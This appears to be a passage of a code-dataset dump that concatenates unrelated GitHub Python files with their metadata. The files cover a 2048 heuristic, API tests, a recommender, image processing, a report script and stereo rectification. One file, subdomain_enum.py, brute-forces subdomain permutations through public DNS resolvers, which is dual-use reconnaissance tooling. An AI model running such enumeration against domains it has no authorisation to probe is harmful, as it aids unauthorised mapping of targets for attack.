\n\t'''\n\tdef calcMonotonicity(self,grid):\n\n\t\ttotalMisplaced = 0\n\t\trow1 = [(0,0),(0,1),(0,2),(0,3)]\n\t\trow2 = [(1,0),(1,1),(1,2),(1,3)]\n\t\trow3 = [(2,0),(2,1),(2,2),(2,3)]\n\t\trow4 = [(3,0),(3,1),(3,2),(3,3)]\n\t\trows = [row1,row2,row3,row4]\n\n\t\t# Calculates the number of changes in the Left/Right direction\n\t\tfor row in rows:\n\t\t\ttotalMisplaced += self.checkNumMisplaced(row,grid,True)\n\n\t\t# Calculates the number of changes in the Up/Down direction.\n\t\tcol1 = [(0,0),(1,0),(2,0),(3,0)]\n\t\tcol2 = [(0,1),(1,1),(2,1),(3,1)]\n\t\tcol3 = [(0,2),(1,2),(2,2),(3,2)]\n\t\tcol4 = [(0,3),(1,3),(2,3),(3,3)]\n\n\t\tcols = [col1,col2,col3,col4]\n\n\t\tfor col in cols:\n\t\t\ttotalMisplaced += self.checkNumMisplaced(col,grid,False)\n\n\t\t# Returns the total number of times values vary\n\t\treturn totalMisplaced\n\n\t'''\n\tUsed to calculate monotonicity. For each direction calculates the number of times\n\tthe values don't consistently grow or shrink.\n\t'''\n\tdef checkNumMisplaced(self,vals,grid,leftRight):\n\n\t\tnumMisplaced = 0\n\n\t\tfor i in xrange(len(vals)):\n\t\t\tcurVal = grid.map[vals[i][0]][vals[i][1]]\n\n\t\t\tif not (curVal == 0):\n\n\t\t\t\tif i+1 < grid.size:\n\t\t\t\t\tnextVal = grid.map[vals[i+1][0]][vals[i+1][1]]\n\n\t\t\t\t\t# For each value sees if its neighbor is correctly smaller or larger\n\t\t\t\t\tif not (nextVal == 0):\n\n\t\t\t\t\t\t# Increases going right in the Left/Right direction\n\t\t\t\t\t\tif leftRight:\n\n\t\t\t\t\t\t\tif nextVal < curVal:\n\t\t\t\t\t\t\t\tnumMisplaced += 1\n\n\t\t\t\t\t\t# Decreases going down in the Up/Down direction\n\t\t\t\t\t\telse:\n\n\t\t\t\t\t\t\tif nextVal > curVal:\n\t\t\t\t\t\t\t\tnumMisplaced += 1\n\n\t\t# Returns the number of inconsistencies for that specific direction\n\t\treturn numMisplaced\n\n\t'''\n\tCalculates the 'Smoothness' or difference between adjacent cells.\n\t'''\n\tdef calcSmoothness(self,grid):\n\n\t\ttotalVal = 0\n\n\t\tfor x in xrange(grid.size):\n\t\t\tfor y in xrange(grid.size):\n\t\t\t\tcurVal = grid.map[x][y]\n\n\t\t\t\t# Only cares about non-zero values\n\t\t\t\tif (curVal > 0):\n\n\t\t\t\t\t# Looks at the value of each of its neighbors \n\t\t\t\t\tneighbors = [(x+1,y),(x-1,y),(x,y+1),(x,y-1)]\n\n\t\t\t\t\tfor neighbor in neighbors:\n\t\t\t\t\t\tif not grid.crossBound(neighbor):\n\n\t\t\t\t\t\t\t# Only cares about non-zero neighbors as well\n\t\t\t\t\t\t\tif (neighbor > 0):\n\n\t\t\t\t\t\t\t\tdiff = abs(curVal-grid.map[neighbor[0]][neighbor[1]])\n\t\t\t\t\t\t\t\ttotalVal += diff\n\n\t\t# Returns the total differences for each node combined \n\t\treturn totalVal\n\n\t'''\n\tCalculates the total of all the grid cell values.\n\t'''\n\tdef getGridTotalValue(self,grid):\n\t\ttotal = 0\n\t\t\n\t\tfor x in xrange(grid.size):\n\t\t\tfor y in xrange(grid.size):\n\t\t\t\ttotal += grid.map[x][y]\n\n\t\t# Returns the total for all grid cells \n\t\treturn total\n\n\t'''\n\tReturns the average tile value by getting the total and dividing by the # of cells.\n\t'''\n\tdef getGridAverageTileValue(self,grid):\n\n\t\treturn float(self.getGridTotalValue(grid))/float(pow((grid.size),2))","repo_name":"nk2739/Portfolio","sub_path":"AI_HW2/PlayerAI.py","file_name":"PlayerAI.py","file_ext":"py","file_size_in_byte":7599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10011306030","text":"\"\"\"\nRewrite spec/functional_specs/policies/batcher/batcher_policy_append_spec.rb\n\"\"\"\nfrom time import sleep\nimport pytest\nfrom testsuite import 
rawobj\n\n\nBATCH_REPORT_SECONDS = 50\n\n\n@pytest.fixture(scope=\"module\")\ndef policy_settings():\n \"\"\"Set policy settings\"\"\"\n return rawobj.PolicyConfig(\"3scale_batcher\", {\"batch_report_seconds\": BATCH_REPORT_SECONDS})\n\n\ndef test_batcher_policy_append(api_client, application):\n \"\"\"Test if return correct number of usages of a service in batch\"\"\"\n client = api_client()\n analytics = application.threescale_client.analytics\n usage_before = analytics.list_by_service(application[\"service_id\"], metric_name=\"hits\")[\"total\"]\n\n for _ in range(5):\n client.get(\"/get\")\n\n usage_after = analytics.list_by_service(application[\"service_id\"], metric_name=\"hits\")[\"total\"]\n assert usage_after == usage_before\n\n # BATCH_REPORT_SECONDS needs to be big enough to execute all the requests to apicast + assert on analytics\n sleep(BATCH_REPORT_SECONDS + 1)\n\n usage_after = analytics.list_by_service(application[\"service_id\"], metric_name=\"hits\")[\"total\"]\n assert usage_after == usage_before + 5\n","repo_name":"mijaros/3scale-tests","sub_path":"testsuite/tests/apicast/policy/batcher/test_batcher_policy_append.py","file_name":"test_batcher_policy_append.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"39827750310","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy import sin,sqrt\n\nseno = lambda w : sin(w*np.linspace(0,2*np.pi,1000))\n\nsenos = np.array([seno(w) for w in range(64)])\nN = len(senos)\namplitudes = np.array([1]*N)/sqrt(N)\n\nfor it in range(1,int(sqrt(N))):\n \n \n senos = np.array([amplitudes[i]*senos[i] for i in range(N)])\n \n plt.figure(figsize=(12,10))\n plt.plot(np.linspace(0,2*np.pi,1000),senos.sum(axis = 0))\n plt.show()\n\n amplitudes = np.array([1]*(3) + [2*it*sqrt(N)] + [1]*(N - 4) )\n norm_factor = 1/((amplitudes**2).sum())\n\n amplitudes = norm_factor*amplitudes\n \n","repo_name":"Raafm/algorithm_visualization","sub_path":"Grover_aux.py","file_name":"Grover_aux.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"17474603430","text":"from typing import Dict, List, Tuple, Union\n\n# Sample code taken from aima-python\n\nclass BayesNode:\n def __init__(self, X: str, parents: List[str], cpt: Dict[Union[tuple, str], float]):\n if isinstance(parents, str):\n parents = parents.split()\n if(isinstance(list(cpt.keys())[0], str)):\n cpt = { (k,): v for (k, v) in cpt.items() }\n self.variable: str = X\n self.parents: List[str] = parents\n self.cpt: Dict[tuple, float] = cpt\n self.values: List[str] = list(set([k[0] for k in cpt.keys()]))\n\n\nclass BayesNet:\n def __init__(self, node_specs: List[Tuple[str, str, Dict[Union[tuple, str], float]]]):\n self.nodes: list[BayesNode] = []\n self.variables: list[str] = []\n node_specs = node_specs or []\n for node_spec in node_specs:\n node = BayesNode(*node_spec)\n self.nodes.append(node)\n self.variables.append(node.variable)","repo_name":"desi-ivanov/bayesian-networks-parser","sub_path":"BNetwork.py","file_name":"BNetwork.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"49818238073","text":"import gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom datetime import date\nfrom datetime import timedelta\nimport requests\nimport json\nimport pandas as 
pd\nimport gspread_dataframe as gd\n\nclass Rasa_Test:\n\n # initialize gspread details & RASA API\n def __init__(self):\n self.scope = ['https://www.googleapis.com/auth/drive']\n self.creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', self.scope)\n self.client = gspread.authorize(self.creds)\n self.url = 'http://localhost:5005/webhooks/rest/webhook'\n\n # Fetch Worksheet Object\n def call_sheet(self,sheet_name,worksheet_name):\n self.sheet = self.client.open(sheet_name).worksheet(worksheet_name)\n return self.sheet\n\n # Fetch required data(Questions) from that Sheet & return with Column_List\n def fetch_data(self, google_sheet, todays_date):\n print(\"data fetching from existing sheet.....\")\n list_of_records = google_sheet.get_all_records()\n Question_list = []\n email_id_list = []\n Name_list = []\n intent_list = []\n for records in list_of_records:\n if records.get('Date') == todays_date:\n question = records.get('question')\n email_id = records.get('email_id')\n name = records.get('name')\n Question_list.append(question)\n email_id_list.append(email_id)\n Name_list.append(name)\n intent_list.append(\"\")\n print(\"data fetched from existing sheet successfully..!\")\n return Question_list, email_id_list, Name_list, intent_list\n\n # Pass question list to RASA api & get Response\n def call_rasa_api(self,question_list):\n Response_list = []\n try:\n print(\"Pass questions list to API.....\")\n print(self.url)\n for ques in question_list:\n payload = {\"sender\": \"mee\", \"message\": ques}\n r = requests.post(self.url, data=json.dumps(payload))\n response_return = r.json()\n Response_list.append(response_return[0].get(\"text\"))\n print(\"response of rasa for each question has done successfully..!\")\n return Response_list\n except:\n print(\"Rasa API connection issue...!\")\n\n # Save & Append output into Google sheet\n def save_output_into_sheet(self,worksheet,df_list):\n existing_df = gd.get_as_dataframe(worksheet)\n #print(\"Existing DF\"+ existing_df)\n try:\n print(\"Output of rasa appending to the new sheet...!\")\n for row in df_list:\n worksheet.append_row(row)\n print(\"Output response of Rasa has been appended to new sheet successfully..!\")\n return True\n except:\n print(\"something went wrong while updating google sheet..!\")\n\nrasa_obj = Rasa_Test()\nsheet = rasa_obj.call_sheet(\"Chatbot_Daily_Report\",\"Chatbot_Daily_Report\")\ntoday = date.today()\nyesterday = today - timedelta(days=1)\nyesterday = yesterday.strftime('%b %d, %Y')\nprint(yesterday)\n# yesterday = \"Sep 01, 2020\"\nquestion_list, email_id, Name, intent_list = rasa_obj.fetch_data(sheet,yesterday)\n# email_id = [item for item in sheet.col_values(3) if item]\n# Name = [item for item in sheet.col_values(4) if item]\ntry:\n if len(question_list) != 0:\n Response_list = rasa_obj.call_rasa_api(question_list)\n d = {'Date':yesterday,'Email':email_id,'Questions': question_list,'Rasa_intent':intent_list,'Rasa_output': Response_list}\n Rasa_dataframe = pd.DataFrame(d)\n # print(Rasa_dataframe)\n df_list_value = Rasa_dataframe.values.tolist()\n created_sheet = rasa_obj.call_sheet(\"Chatbot_Daily_Report\",\"BL_BOT_Compare\")\n output = rasa_obj.save_output_into_sheet(created_sheet,df_list_value)\n if output == True:\n print(\"Added today's data successfully...!!!\")\n else:\n print(\"Something Issue at Rasa API backend\")\nexcept:\n print(\"No interaction happened in today's 
date.\")\n\n","repo_name":"santoshikalaskar/chatbot_report_generation_google_App_script","sub_path":"fetch_google_sheet_questions_apply_rasa_api_save_back_output.py","file_name":"fetch_google_sheet_questions_apply_rasa_api_save_back_output.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10462082786","text":"import time\nfrom paramiko import SSHClient\nfrom scp import SCPClient\nfrom loguru import logger\n\n\n# Instantiating SSH client\nwith SSHClient() as ssh:\n ssh.load_system_host_keys()\n ssh.connect(\"l1\", username=\"twkim\")\n # Transfer directory to the remote_path\n with SCPClient(ssh.get_transport()) as scp:\n logger.info(\"SCP Transfer starts...\")\n execution_begin = time.time()\n scp.put(\n r\"P:\\IRB_STUDY00146630_RheSolve\\Data\\ImageData\\DCM_20220216-16_GALA_TK\\127-06-015_20220216\\DEID\",\n recursive=True,\n remote_path=\"/home/twkim/test\",\n )\n execution_end = time.time()\n execution_interval = execution_end - execution_begin\n logger.info(f\"SCP Transfer finished! Total time: {execution_interval}s\")\n","repo_name":"rlaxodnjs199/kumc-ImageProcessing","sub_path":"Util/l1_scp.py","file_name":"l1_scp.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70831054763","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Cretaing the Pixel array \n\nfrom PIL import Image\nfrom PIL import Image, ImageOps\nimport numpy as np\n\nimport os\npath = '/Volumes/MY_PASSPORT/JRF/cancer_genome/gopal_gen_copy/png_files'\n\nimage_list = []\nfor entry in os.listdir():\n if entry.endswith('.png'):\n image_list.append(entry)\n\nprint(image_list)\ndef get_concat_h_multi_resize(im_list, resample=Image.BICUBIC):\n max_height = max(im.height for im in im_list)\n #print(max_height)\n im_list_resize = [im.resize((int(im.width * max_height / im.height), max_height),resample=resample) for im in im_list]\n #print(im_list)\n #im_list_resize = im_list\n total_width = sum(im.width for im in im_list_resize)\n #print(total_width)\n dst = Image.new('RGB', (total_width, max_height))\n pos_x = 0\n for im in im_list_resize:\n dst.paste(im, (pos_x, 0))\n pos_x += im.width\n return dst\n\ndef get_concat_v_multi_resize(im_list, resample=Image.BICUBIC):\n max_width = max(im.width for im in im_list)\n #im_list_resize = [im.resize((min_width, int(im.height * max_width / im.width)),resample=resample) for im in im_list]\n im_list_resize = im_list\n total_height = sum(im.height for im in im_list_resize)\n dst = Image.new('RGB', (max_width, total_height))\n pos_y = 0\n for im in im_list_resize:\n dst.paste(im, (0, pos_y))\n pos_y += im.height\n return dst\n\ndef get_concat_tile_resize(im_list_2d, resample=Image.BICUBIC):\n im_list_v = [get_concat_h_multi_resize(im_list_h, resample=resample) for im_list_h in im_list_2d]\n return get_concat_v_multi_resize(im_list_v, resample=resample)\n\nim = [Image.open(x) for x in image_list]\n\nfor entry in os.listdir(path):\n if entry.endswith('.png'):\n get_concat_tile_resize([[im[0], im[1]],\n [im[2], im[3],im[4]],\n [im[5]],\n [im[6], im[7]],\n [im[8], im[9]], \n [im[10],im[11]],\n [im[12]],\n [im[13]],\n [im[14], im[15]],\n [im[16]]\n 
]).save('pillow_concat_tile_resize.tiff')\n\n","repo_name":"gnsrivastava/image_project","sub_path":"grid_script.py","file_name":"grid_script.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34038235556","text":"\n\nimport argparse\nimport dns.resolver\n\nDNS_SERVERS = ['8.8.8.8', '9.9.9.9', '4.2.2.1']\n\n# ANSI codes for some pretty terminal output\nclass bcolors:\n OK = '\\033[92m' # GREEN\n WARNING = '\\033[93m' # YELLOW\n FAIL = '\\033[91m' # RED\n RESET = '\\033[0m' # RESET COLOR\n\ndomains_exist = []\n\ndef permute(base, domain, permutations):\n names_to_try = []\n for item in permutations:\n names_to_try.append(f\"{item}{base}.{domain}\")\n names_to_try.append(f\"{base}{item}.{domain}\")\n names_to_try.append(f\"{item}.{base}.{domain}\")\n names_to_try.append(f\"{base}.{item}.{domain}\")\n names_to_try.append(f\"{item}-{base}.{domain}\")\n names_to_try.append(f\"{base}-{item}.{domain}\")\n return names_to_try\n \n\ndef resolve(name):\n global domains_exist\n resolver = dns.resolver.Resolver(configure=False)\n resolver.nameservers = DNS_SERVERS\n try:\n answer = resolver.resolve(name, 'A')\n print(f\"{bcolors.OK}{name}{bcolors.RESET} exists\")\n # We don't care what the IP is, just that the name exists\n domains_exist.append(name)\n except dns.resolver.NoAnswer as e:\n # This exception means there's some kind of record, but no IP was returned\n print(f\"Exists but no IP for {bcolors.WARNING}{name}{bcolors.RESET}\")\n domains_exist.append(name)\n except Exception as e:\n pass\n\n\ndef main():\n\n parser = argparse.ArgumentParser(\n description='Enumerate Azure Cloud resources')\n parser.add_argument('--base', help='Base word')\n parser.add_argument('--permutations', default='permutations.txt',\n help='File containing permutations')\n parser.add_argument('--domains', default='domains.txt',\n help='File containing domains')\n parser.add_argument('--outfile', help='Output file')\n\n args = parser.parse_args()\n base = args.base\n permutations_file = args.permutations\n domains_file = args.domains\n outfile = args.outfile\n\n with open(permutations_file) as f:\n permutations = f.read().splitlines()\n\n with open(domains_file) as f:\n domains = f.read().splitlines()\n\n for domain in domains:\n print(f\"Enumerating {domain}...\")\n candidates = permute(base, domain, permutations)\n candidates.append(f\"{base}.{domain}\")\n for candidate in candidates:\n resolve(candidate)\n\n with open(outfile, \"w\") as f:\n for domain in domains_exist:\n f.write(f\"{domain}\\n\")\n\n\nif __name__ == '__main__':\n main()","repo_name":"swtornio/subdomain_enum","sub_path":"subdomain_enum.py","file_name":"subdomain_enum.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70956026284","text":"from typing import List, Dict\n\nfrom scipy import sparse\nfrom sklearn import neighbors\nfrom sklearn.calibration import CalibratedClassifierCV\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.gaussian_process import GaussianProcessClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import FunctionTransformer\nfrom sklearn.svm import LinearSVC\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom 
orange_cb_recsys.content_analyzer.content_representation.content import Content\n\nimport pandas as pd\n\nfrom orange_cb_recsys.recsys.algorithm import RankingAlgorithm\nfrom orange_cb_recsys.utils.const import logger\nfrom orange_cb_recsys.utils.load_content import get_rated_items, get_unrated_items, load_content_instance\n\n\nclass ClassifierRecommender(RankingAlgorithm):\n \"\"\"\n Class that implements a logistic regression classifier.\n\n Args:\n item_field (str): Name of the field that contains the content to use\n field_representation (str): Id of the field_representation content\n classifier(str): classifier that will be used\n can be one of the following values:\n random_forest, svm, log_regr,\n knn, decision_tree, gaussian_process\n threshold: ratings bigger than threshold will be\n considered as positive\n _fields_representations (Dict): same of field_representation (str), but here\n there is a Dict, where the key is the name field and the values are the representations of the field.\n _item_fields (List): same of item_field, but here there is a list of more fields\n classifier_parameters (Dict) = a Dict the describe the parameters for the type of classifier used\n \"\"\"\n def __init__(self, item_field: str = None, field_representation: str = None, classifier: str = None, threshold=-1,\n _item_fields: List = None, _fields_representations: Dict = None, classifier_parameters: Dict = None):\n super().__init__(item_field, field_representation)\n self.__classifier: str = classifier\n self.__threshold = threshold\n self.__item_fields = _item_fields\n self.__field_representations = _fields_representations\n self.__classifier_parameters = classifier_parameters\n # aggiungi opzioni\n\n def predict(self, user_id: str, ratings: pd.DataFrame, recs_number: int, items_directory: str, candidate_item_id_list: List = None) -> pd.DataFrame:\n \"\"\"\n 1) Goes into items_directory and for each item takes the values corresponding to the field_representation of\n the item_field. 
For example, if item_field == \"Plot\" and field_representation == \"tf-idf\", the function will\n take the \"tf-idf\" representation of each \"Plot\" field for every rated item, the tf-idf representation of rated items\n and items to classify will be parsed to dense arrays;\n 2) Define target features, items with rating greater (lower) than threshold will be used as positive(negative) examples;\n 3) Creates an object Classifier, uses the method fit and predicts the class of the new items\n\n Args:\n candidate_item_id_list: list of the items that can be recommended, if None\n all unrated items will be used\n user_id: user for which recommendations will be computed\n recs_number (list[Content]): How long the ranking will be\n ratings (pd.DataFrame): ratings of the user with id equal to user_id\n items_directory (str): Name of the directory where the items are stored.\n\n Returns:\n The predicted classes, or the predict values.\n \"\"\"\n\n if candidate_item_id_list is None:\n unrated_items = get_unrated_items(items_directory, ratings)\n else:\n unrated_items = [load_content_instance(items_directory, item_id) for item_id in candidate_item_id_list]\n\n rated_features_bag_list = []\n unrated_features_bag_list = []\n\n logger.info(\"Retrieving rated items\")\n rated_items = get_rated_items(items_directory, ratings)\n if self.__threshold == -1:\n threshold = pd.to_numeric(ratings[\"score\"], downcast=\"float\").mean()\n else:\n threshold = self.__threshold\n\n labels = []\n if self.__item_fields is None:\n for item in rated_items:\n if item is not None:\n rated_features_bag_list.append(item.get_field(self.item_field).get_representation(self.item_field_representation).value)\n labels.append(1 if float(ratings[ratings['to_id'] == item.content_id].score) >= threshold else 0)\n else:\n for item in rated_items:\n if item is not None:\n for item_field in self.__item_fields:\n if item_field in self.__field_representations.keys():\n __field_representations = self.__field_representations[item_field]\n for field_representation in __field_representations:\n rated_features_bag_list.append(\n item.get_field(item_field).get_representation(field_representation).value)\n labels.append(\n 1 if float(ratings[\n ratings['to_id'] == item.content_id].score) >= threshold else 0)\n\n logger.info(\"Labeling examples\")\n if self.__item_fields is None:\n for item in unrated_items:\n if item is not None:\n unrated_features_bag_list.append(item.get_field(self.item_field).get_representation(self.item_field_representation).value)\n else:\n for item in unrated_items:\n if item is not None:\n for item_field in self.__item_fields:\n if item_field in self.__field_representations.keys():\n __field_representations = self.__field_representations[item_field]\n for field_representation in __field_representations:\n unrated_features_bag_list.append(\n item.get_field(item_field).get_representation(field_representation).value)\n\n clf = None\n if self.__classifier.lower() == \"random_forest\":\n if self.__classifier_parameters is not None:\n clf = RandomForestClassifier(**self.__classifier_parameters)\n else:\n clf = RandomForestClassifier(n_estimators=400, random_state=42)\n\n elif self.__classifier.lower() == \"svm\":\n if self.__classifier_parameters is not None:\n clf = CalibratedClassifierCV(LinearSVC(**self.__classifier_parameters))\n else:\n clf = CalibratedClassifierCV(LinearSVC(random_state=42))\n\n elif self.__classifier.lower() == \"log_regr\":\n if self.__classifier_parameters is not None:\n clf = 
LogisticRegression(**self.__classifier_parameters)\n else:\n clf = LogisticRegression(random_state=42)\n\n elif self.__classifier.lower() == \"knn\":\n if self.__classifier_parameters is not None:\n clf = neighbors.KNeighborsClassifier()\n else:\n clf = neighbors.KNeighborsClassifier()\n\n elif self.__classifier.lower() == \"decision_tree\":\n if self.__classifier_parameters is not None:\n clf = DecisionTreeClassifier(**self.__classifier_parameters)\n else:\n clf = DecisionTreeClassifier(random_state=42)\n\n elif self.__classifier.lower() == \"gaussian_process\":\n if self.__classifier_parameters is not None:\n clf = GaussianProcessClassifier(**self.__classifier_parameters)\n else:\n clf = GaussianProcessClassifier(random_state=42)\n\n logger.info(\"Fitting classifier\")\n if self.__classifier.lower() == \"gaussian_process\":\n pipe = make_pipeline(DictVectorizer(sparse=True), FunctionTransformer(lambda x: x.todense(), accept_sparse=True), clf)\n else:\n pipe = make_pipeline(DictVectorizer(sparse=True), clf)\n\n pipe = pipe.fit(rated_features_bag_list, labels)\n\n columns = [\"to_id\", \"rating\"]\n score_frame = pd.DataFrame(columns=columns)\n\n logger.info(\"Predicting scores\")\n score_labels = pipe.predict_proba(unrated_features_bag_list)\n\n for score, item in zip(score_labels, unrated_items):\n if item is not None:\n score_frame = pd.concat([score_frame, pd.DataFrame.from_records([(item.content_id, score[1])], columns=columns)], ignore_index=True)\n\n score_frame = score_frame.sort_values(['rating'], ascending=False).reset_index(drop=True)\n score_frame = score_frame[:recs_number]\n\n return score_frame\n","repo_name":"m3ttiw/orange_cb_recsys","sub_path":"orange_cb_recsys/recsys/ranking_algorithms/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":9120,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"74786034603","text":"import torch\nimport numpy as np\nfrom embed.datasets import PIPELINES\nfrom embed.datasets.pipelines import DefaultFormatBundle, to_tensor\nfrom embed.cv.parallel import DataContainerWithPad as DC\n\nfrom embed.core import BitmapMasks\n\n@PIPELINES.register_module()\nclass PanopticFCNFormatBundle(DefaultFormatBundle):\n \"\"\"Default formatting bundle.\n\n It simplifies the pipeline of formatting common fields, including \"img\",\n \"proposals\", \"gt_bboxes\", \"gt_labels\", \"gt_masks\" and \"gt_semantic_seg\".\n These fields are formatted as follows.\n\n - img: (1)transpose, (2)to tensor, (3)to DataContainer (stack=True)\n - proposals: (1)to tensor, (2)to DataContainer\n - gt_bboxes: (1)to tensor, (2)to DataContainer\n - gt_bboxes_ignore: (1)to tensor, (2)to DataContainer\n - gt_labels: (1)to tensor, (2)to DataContainer\n - gt_areas: (1)to tensor, (2)to DataContainer\n - gt_centers: (1)to tensor, (2)to DataContainer\n - gt_masks: (0)assert isinstance(gt_masks, BitmapMasks)\n (1)to tensor, (2)to DataContainer\n - gt_semantic_seg: (1)unsqueeze dim-0 (2)to tensor, \\\n (3)to DataContainer (stack=True)\n \"\"\"\n\n def __call__(self, results):\n \"\"\"Call function to transform and format common fields in results.\n\n Args:\n results (dict): Result dict contains the data to convert.\n\n Returns:\n dict: The result dict contains the data that is formatted with \\\n default bundle.\n \"\"\"\n\n if 'img' in results:\n img = results['img']\n # add default meta keys\n results = self._add_default_meta_keys(results)\n if len(img.shape) < 3:\n img = np.expand_dims(img, -1)\n img = 
np.ascontiguousarray(img.transpose(2, 0, 1))\n results['img'] = DC(to_tensor(img), stack=True)\n for key in ['proposals', 'gt_bboxes', 'gt_bboxes_ignore', 'gt_labels',\n 'gt_areas', 'gt_centers']:\n if key not in results:\n continue\n results[key] = DC(to_tensor(results[key]))\n if 'gt_masks' in results:\n assert isinstance(results['gt_masks'], BitmapMasks)\n# results['gt_masks'] = DC(results['gt_masks'].to_tensor(dtype=torch.uint8, device=torch.device('cpu')), pad=True)\n results['gt_masks'] = DC(results['gt_masks'].to_tensor(dtype=torch.float32, device='cpu'), pad=True)\n if 'gt_semantic_seg' in results:\n results['gt_semantic_seg'] = DC(\n to_tensor(results['gt_semantic_seg'][None, ...]), stack=True)\n return results\n","repo_name":"xmyqsh/embed","sub_path":"embed/datasets/pipelines/formating.py","file_name":"formating.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37615784830","text":"from jugaad_data.rbi import RBI\nimport pytest\n\ndef test_current_rates():\n r = RBI()\n rates = r.current_rates()\n assert '91 day T-bills' in rates\n assert 'Policy Repo Rate' in rates\n assert 'Savings Deposit Rate' in rates\n # Below should not raise exception\n val = float(rates['91 day T-bills'].replace('%',\"\"))\n","repo_name":"jugaad-py/jugaad-data","sub_path":"tests/test_rbi.py","file_name":"test_rbi.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":246,"dataset":"github-code","pt":"19"} +{"seq_id":"40186945929","text":"\"\"\"\nScript for 3D epipolar lines, stereorectification and depth map.\nLinnea Evanson\n13/02/21\n\n\"\"\"\nfrom __future__ import print_function\n\nimport numpy as np\nimport cv2 as cv\nfrom matplotlib import pyplot as plt\nfrom resize import resize\n\nclass threeD():\n def __init__(self, img1, img2):\n self.img1 = img1\n self.img2 = img2\n\n def stereo_rectify(self):\n img1= cv.cvtColor(self.img1, cv.COLOR_BGR2GRAY)\n img2 = cv.cvtColor(self.img2, cv.COLOR_BGR2GRAY)\n\n # Initiate SIFT detector\n sift = cv.SIFT_create()\n # find the keypoints and descriptors with SIFT\n kp1, des1 = sift.detectAndCompute(img1, None)\n kp2, des2 = sift.detectAndCompute(img2, None)\n\n\n # Match keypoints in both images\n FLANN_INDEX_KDTREE = 1\n index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)\n search_params = dict(checks=50) # or pass empty dictionary\n flann = cv.FlannBasedMatcher(index_params, search_params)\n matches = flann.knnMatch(des1, des2, k=2)\n\n # Keep good matches: calculate distinctive image features\n # Lowe, D.G. Distinctive Image Features from Scale-Invariant Keypoints. International Journal of Computer Vision 60, 91–110 (2004). 
https://doi.org/10.1023/B:VISI.0000029664.99615.94\n # https://www.cs.ubc.ca/~lowe/papers/ijcv04.pdf\n matchesMask = [[0, 0] for i in range(len(matches))]\n good = []\n pts1 = []\n pts2 = []\n\n for i, (m, n) in enumerate(matches):\n if m.distance < 0.7 * n.distance:\n # Keep this keypoint pair\n matchesMask[i] = [1, 0]\n good.append(m)\n pts2.append(kp2[m.trainIdx].pt)\n pts1.append(kp1[m.queryIdx].pt)\n\n # STEREO RECTIFICATION\n # Calculate the fundamental matrix for the cameras\n pts1 = np.int32(pts1)\n pts2 = np.int32(pts2)\n fundamental_matrix, inliers = cv.findFundamentalMat(pts1, pts2, cv.FM_RANSAC)\n\n # We select only inlier points\n pts1 = pts1[inliers.ravel() == 1]\n pts2 = pts2[inliers.ravel() == 1]\n\n\n # Stereo rectification (uncalibrated variant)\n # Adapted from: https://stackoverflow.com/a/62607343\n h1, w1 = img1.shape\n h2, w2 = img2.shape\n _, H1, H2 = cv.stereoRectifyUncalibrated(\n np.float32(pts1), np.float32(pts2), fundamental_matrix, imgSize=(w1, h1)\n )\n\n # Undistort (rectify) the images and save them\n # Adapted from: https://stackoverflow.com/a/62607343\n img1_rectified = cv.warpPerspective(img1, H1, (w1, h1))\n img2_rectified = cv.warpPerspective(img2, H2, (w2, h2))\n cv.imwrite(\"rectified_1.png\", img1_rectified)\n cv.imwrite(\"rectified_2.png\", img2_rectified)\n\n # Draw the rectified images\n fig, axes = plt.subplots(1, 2, figsize=(15, 10))\n axes[0].imshow(img1_rectified, cmap=\"gray\")\n axes[1].imshow(img2_rectified, cmap=\"gray\")\n axes[0].axhline(1500)\n axes[1].axhline(1500)\n axes[0].axhline(2000)\n axes[1].axhline(2000)\n axes[0].axhline(1750)\n axes[1].axhline(1750)\n axes[0].axhline(1750)\n axes[1].axhline(1750)\n axes[0].axhline(2200)\n axes[1].axhline(2200)\n\n plt.suptitle(\"Rectified images\")\n plt.savefig(\"rectified_images.png\")\n plt.show()\n\n return img1_rectified, img2_rectified\n\n def depth_map_rectified(self, imgL, imgR):\n\n #Matched block size. It must be an odd number >=1 . Normally, it should be somewhere in the 3..11 range.\n block_size = 11\n min_disp = -128\n max_disp = 128\n # Maximum disparity minus minimum disparity. The value is always greater than zero.\n # In the current implementation, this parameter must be divisible by 16.\n num_disp = max_disp - min_disp\n # Margin in percentage by which the best (minimum) computed cost function value should \"win\" the second best value to consider the found match correct.\n # Normally, a value within the 5-15 range is good enough\n uniquenessRatio = 5\n # Maximum size of smooth disparity regions to consider their noise speckles and invalidate.\n # Set it to 0 to disable speckle filtering. 
